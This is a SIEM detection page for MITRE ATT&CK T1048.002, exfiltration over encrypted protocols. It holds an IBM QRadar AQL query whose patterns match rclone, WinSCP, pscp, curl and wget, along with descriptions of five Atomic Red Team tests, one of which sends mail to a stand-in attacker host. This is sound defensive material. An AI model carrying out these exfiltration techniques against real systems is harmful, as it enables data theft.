T1048.002 IBM QRadar · QRadar

Detect Exfiltration Over Asymmetric Encrypted Non-C2 Protocol in IBM QRadar

Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. Common protocols include HTTPS/TLS, SFTP, SCP, SMTPS, and FTPS. These protocols use asymmetric encryption (public-key cryptography) for key exchange, often transitioning to symmetric encryption for bulk data transfer. Because these protocols are widely used for legitimate business purposes, malicious exfiltration traffic can blend in with normal network activity. Threat actors such as APT28, CURIUM, and Storm-1811 have leveraged HTTPS, SMTPS, and SCP respectively for data exfiltration.

MITRE ATT&CK

Tactic
Exfiltration
Technique
T1048 Exfiltration Over Alternative Protocol
Sub-technique
T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Canonical reference
https://attack.mitre.org/techniques/T1048/002/

QRadar Detection Query

IBM QRadar (QRadar)
sql 
SELECT DATEFORMAT(starttime, 'yyyy-MM-dd HH:mm:ss') AS EventTime,
       LOGSOURCENAME(logsourceid) AS LogSource,
       username,
       sourceip,
       destinationip,
       destinationport,
       "EventID",
       "Process Name" AS ProcessName,
       "CommandLine",
       CATEGORYNAME(category) AS Category
FROM events
WHERE LOGSOURCETYPEID IN (12, 229)
  AND (
    (
      "EventID" IN ('1', '4688')
      AND (
        "Process Name" IMATCHES '(?i)(rclone\.exe|winscp\.exe|pscp\.exe|psftp\.exe|filezilla\.exe|sftp\.exe|scp\.exe|curl\.exe|wget\.exe)'
        OR (
          "Process Name" IMATCHES '(?i)(powershell\.exe|cmd\.exe)'
          AND "CommandLine" IMATCHES '(?i)(sftp|\bscp\b|smtps|ftps|webdav|rclone|winscp)'
        )
        OR (
          "Process Name" IMATCHES '(?i)curl\.exe'
          AND "CommandLine" IMATCHES '(?i)(--ssl|--tls|sftp://|ftps://)'
        )
      )
    )
    OR (
      "EventID" = '3'
      AND destinationport IN (22, 443, 465, 587, 990, 993, 8443, 21)
      AND (
        "Process Name" IMATCHES '(?i)(rclone\.exe|winscp\.exe|pscp\.exe|psftp\.exe|filezilla\.exe|sftp\.exe|scp\.exe|curl\.exe|wget\.exe)'
        OR "CommandLine" IMATCHES '(?i)(sftp|smtps|webdav|ftps|rclone)'
      )
      AND NOT (
        destinationip ILIKE '10.%'
        OR destinationip ILIKE '172.16.%' OR destinationip ILIKE '172.17.%' OR destinationip ILIKE '172.18.%'
        OR destinationip ILIKE '172.19.%' OR destinationip ILIKE '172.20.%' OR destinationip ILIKE '172.21.%'
        OR destinationip ILIKE '172.22.%' OR destinationip ILIKE '172.23.%' OR destinationip ILIKE '172.24.%'
        OR destinationip ILIKE '172.25.%' OR destinationip ILIKE '172.26.%' OR destinationip ILIKE '172.27.%'
        OR destinationip ILIKE '172.28.%' OR destinationip ILIKE '172.29.%' OR destinationip ILIKE '172.30.%'
        OR destinationip ILIKE '172.31.%'
        OR destinationip ILIKE '192.168.%'
        OR destinationip ILIKE '127.%'
      )
    )
  )
  AND LAST 24 HOURS
ORDER BY EventTime DESC
high severity high confidence

Detects T1048.002 exfiltration over asymmetrically encrypted non-C2 protocols using IBM QRadar AQL. Queries Sysmon (LOGSOURCETYPEID 229) and Windows Security (LOGSOURCETYPEID 12) events. Covers EventID 1/4688 (ProcessCreate) for known exfiltration tool execution and suspicious shell invocations, and EventID 3 (NetworkConnect) for those processes making outbound connections to encrypted protocol ports on public IP addresses. Excludes RFC1918 and loopback address ranges.

Data Sources

IBM QRadar with Windows Security Event Log DSMIBM QRadar with Sysmon Universal DSM

Required Tables

events

False Positives & Tuning

  • Authorized use of WinSCP, FileZilla, or rclone by IT administrators for routine file transfer operations to managed external SFTP servers or cloud storage buckets
  • Automated backup jobs configured to run rclone or similar tools to push encrypted backups to approved cloud providers via SFTP or HTTPS
  • DevOps pipelines using curl or wget to push build artifacts over HTTPS to external container registries, artifact stores, or partner APIs
  • Security tooling performing encrypted callbacks to vendor SaaS infrastructure over standard HTTPS ports as part of licensed product operation
Download portable Sigma rule (.yml)

Other platforms for T1048.002

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 5 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Rclone Exfiltration via SFTP

    Expected signal: Sysmon Event ID 1: Process Create with Image=rclone.exe, CommandLine containing 'copy', 'sftp://', destination IP, and --sftp-pass flag. Sysmon Event ID 3: Network connection attempt to 192.0.2.1:22. DeviceProcessEvents and DeviceNetworkEvents in MDE will capture the event.

  2. Test 2SCP File Transfer to External Host

    Expected signal: Sysmon Event ID 1: Process Create with Image=pscp.exe, CommandLine containing destination IP, remote path, and -pw flag (password in clear text is itself a forensic indicator). Sysmon Event ID 3: TCP connection attempt to 198.51.100.1:22. Security Event ID 4688 if command-line auditing is enabled.

  3. Test 3PowerShell HTTPS Exfiltration via WebClient Upload

    Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'Net.WebClient', 'UploadData', and 'https://'. Sysmon Event ID 3: TCP connection attempt to 127.0.0.1:4443. PowerShell ScriptBlock Log Event ID 4104 with full script. DeviceNetworkEvents in MDE will show the HTTPS connection attempt.

  4. Test 4Rclone MEGA Cloud Storage Exfiltration Simulation

    Expected signal: Sysmon Event ID 11: File creation of rclone_test.conf in %TEMP% containing MEGA credentials. Sysmon Event ID 1: Process Create with Image=rclone.exe, CommandLine referencing --config path and 'mega_remote:'. Sysmon Event ID 3: DNS query and TCP connection attempt to MEGA API endpoints (g.api.mega.co.nz). DeviceFileEvents will capture config file creation.

  5. Test 5SMTPS Email Exfiltration via PowerShell

    Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'SmtpClient', 'EnableSsl = $true', port 587, and external hostname. Sysmon Event ID 3: TCP connection attempt to smtp.attacker-controlled.com:587. Sysmon Event ID 22: DNS query for attacker-controlled.com. PowerShell ScriptBlock Log Event ID 4104 with full script content.

Last updated: 2026-04-16 Research depth: deep
References (10)

Unlock Pro Content

Get the full detection package for T1048.002 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1048Exfiltration Over Alternative Protocol

Related Sub-techniques

T1048.001Exfiltration Over Symmetric Encrypted Non-C2 ProtocolT1048.003Exfiltration Over Unencrypted Non-C2 Protocol

Related Techniques

T1048Exfiltration Over Alternative ProtocolT1048.001Exfiltration Over Symmetric Encrypted Non-C2 ProtocolT1567Exfiltration Over Web ServiceT1567.001Exfiltration to Code RepositoryT1567.004Exfiltration Over WebhookT1560Archive Collected DataT1560.001Archive via UtilityT1074Data StagedT1029Scheduled TransferT1020Automated ExfiltrationT1005Data from Local SystemT1078Valid Accounts

Same Tactic: Exfiltration

Popular Detections